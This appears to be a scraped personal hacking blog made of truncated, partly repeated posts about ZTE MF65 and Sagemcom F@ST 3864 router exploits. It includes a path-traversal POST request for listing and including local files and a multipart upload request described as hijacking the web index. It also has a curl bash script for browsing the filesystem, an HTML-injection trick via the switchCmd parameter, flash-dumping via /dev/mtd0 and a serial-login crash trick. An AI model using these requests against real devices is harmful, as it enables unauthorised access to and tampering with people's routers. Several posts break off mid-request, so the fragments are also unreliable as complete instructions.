Franks Electric Dreams

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package ///// another super quick one for a even better listing in the web application with the ability to change your path via the sd card settings, we use the exploit from last time to gain a web app access to the web folder, this time though we have a little bit more work to do, so here we go from the start : POST /goform/goform_set_cmd_process HTTP/1.1 Host: 192.168.0.1 isTest=false&goformId=HTTPSHARE_AUTH_SET &HTTP_SHARE_STATUS=Enabled &HTTP_SHARE_WR_AUTH=readWrite &HTTP_SHARE_FILE=..%2Fweb%2F using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager, you will need to be logged in for this method. so your work flow is: login send request to change path  logout use the httpguest button to see the files now we will navigate to web/js/config/ then we will download the config.js file and change the line :  SD_BASE_PATH: /mmc2/ to  SD_BASE_PAT

another super quick one for a better listing in the web application POST /goform/goform_set_cmd_process HTTP/1.1 Host: 192.168.0.1 isTest=false&goformId=HTTPSHARE_AUTH_SET &HTTP_SHARE_STATUS=Enabled &HTTP_SHARE_WR_AUTH=readWrite &HTTP_SHARE_FILE=..%2Fweb%2F using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager, you will need to be logged in for this method. so your work flow is: login send request to change path  logout use the httpguest button to see the files this can be used to include files, delete, create and rename files/folders. this is method requires login but other methods can work without a login. till next time :) FrankSxx

  ##  File Upload/Exec LFI ## hey new one, demonstration of web server executable includes use post to send off this file, this file has our basic index re uploaded without the service providers logo use hijack.html to load the new file, it may fail it also may say it was a success without actually working use with the lister bash script to check the /webs folder POST /cgi-bin/web/Hijack.html HTTP/1.1 Host: Your IP Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=---------------------------13738844281409151800268458935 Content-Length: 10299 -----------------------------13738844281409151800268458935 Content-Disposition: form-data; name="path_SD_CARD_time" 2016-06-12 04:28:43 -----------------------------13738844281409151800268458935 Content-Disposition: form-data; name="path_SD_CARD_time_unix" 1465705724 ----

quick upload: these have (your.local.ip) change to suit yours bash script for file listings: ################################### #!/bin/sh echo "use ^c to exit" echo "path" read PARAM1 echo "page\(please use 1 as default\(10 r/s per page\)\)" read PARAM2 echo '     ' HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM2" curl "$HOST_PARAM" echo '     ' echo "New Page Number? or 0 to go back." read PARAM3 HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM3"     curl "$HOST_PARAM"     echo ' ' echo "use ^c to exit" echo "path" read PARAM1 echo "page\(please use 1 as default\(10 r/s per page\)\)&

///Zte MF65 local file listing/include exploits/// hey guys back again and another quickie but goodie, ive been searching for any traces of the internal filesystem of this router by every method of lfi i could think of, i was lured to the http share page, this is the page used to upload files into the sd card, it seems to be locked to the mmc2 path, via the requests made, the paths are set in the httpshare files (off the top of my head they are in the tmpl/sd path and in the js path) the htttp page uses a directory check to obtain a listing of the files in the said directory(mmc2) by changing the check querys we end up with a few local file listing includes and a few local file includes: we are using xml reqeusts via your favourite request launcher (nc,curl,burp,whatevs) using: POST /goform/goform_set_cmd_process HTTP/1.1 Host: 192.165.0.1 User-Agent: your own uA  Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

ZTE (telstra) MF65 Remote file include : this exploit uses : http:// Your-R-IP /goform/goform_process?goformId=MODE_SWITCH&switchCmd= and exploits the loose handling of closing html tags because the switchCmd  page  uses a unclosed <title> tag to normally write the switch command and return either success or fail in the page title, this leads us to closing the <tiltle> and starting a new tag, i found <xyz> worked as an arbitrary tag  , this worked great(you could use anything in there), so we have :   switchCmd=pagenamegoeshere</title><xyz> and using the img tag and span tags we get <img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this w

Wednesday, 1 June 2016 F@ST 3864v1: dumping the filesys F@ST 3864v1: dumping the filesys   this is easily accomplished via cat: #cat /dev/mtd0 > (either(/tmp/www/mtd.jpg)(/mnt/usb1_1)   retrive the file via http://localhost/tmp/www/mtd.jpg  Or Via usb or Even Tftp the rootFS.jffs2 is stored in mtd0 (this will include the cferam.000 file ) the rootFs_update is stored in mtd1 the data is stored in mtd2 the nvram is stored in mtd3  you can use binwalk to extract the rootfs as long as you have installed jefferson(jffs2 libary)(https://github.com/sviehb/jefferson) Now we can turn our focuses towards the bin contents and the lib functions.. stay tuned

F@ST 3864v1: serial prompt authentication exploit.  F@ST 3864v1:  serial prompt authentication exploit. ok guys this ones a really quick one, ive got alot to come but this is urgent :P during my usual diggings i was left sitting at the caret waiting on a login to begin.. Login: ///////////////////////////////////////////////////////////////////////// Password:                                                                       Login incorrect. Try again.                                                next i thought just a web null what could be the worst that happens: Login:                                                                     Password:                                                                       Login incorrect. Try again. next was: Login: %^]���^B����؀=y4���^B���^\ just as a random ammount of unicode chars and then i learnt that i could simply use Login: ^\ (this ones the stty quit command) wlmngr/669: potentially unexpected fatal sign . smd/340: potentially